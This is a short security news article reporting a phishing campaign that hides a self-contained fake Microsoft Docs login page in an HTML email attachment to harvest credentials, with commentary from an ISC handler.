Source: Cyware | By Ryan Stewart
• Researchers have spotted a new phishing campaign that steals credentials. However, this campaign is different from the commonly observed ones.
• The email used in this campaign was seen to contain the traditional payment notice phishing text.
How is this scam different?
This newly-spotted credential phishing campaign does not redirect victims to another site for login, like a lot of phishing campaigns usually do.
• Instead, it bundles the scam’s landing page in the HTML attachment to prevent users from getting suspicious.
• Phishing scams can usually be detected with suspicious links and landing pages. This scam avoids these all together and opts for a self-contained webpage that steals credentials.
• By doing this, the malicious actors behind the campaign are reducing the chances of the landing page being discovered and subsequently removed.
• The attachment is said to have all files and libraries required for harvesting credentials and relies on a remote server only to collect the stolen information.
“The HTML attachment it carried, however, turned out to be anything but usual. When HTML attachments are used in a credentials-stealing phishing, the HTML code usually either redirects the browser to a fake login page, or it directly loads the fake login page from a source on the internet. This HTML page turned out not to do either of those,” says ISC Handler Jan Kopriva.
How does it work?
When the victim opens the attachment in the email, a Microsoft Docs login form is rendered directly in the browser.
• The form provides a number of options to log in, including Gmail, Yahoo, and Office 365, among the others.
• When the victim unknowingly enters credentials, the malicious script harvests the information and then redirects to a remote site with a fake payment invoice.
• Now even if the victim realizes that this is a phishing page, it doesn’t make a difference because the credentials have already been harvested.
Although this isn’t the first phishing campaign to use this technique, security experts say that it is one of the few to contain such a complex HTML attachment.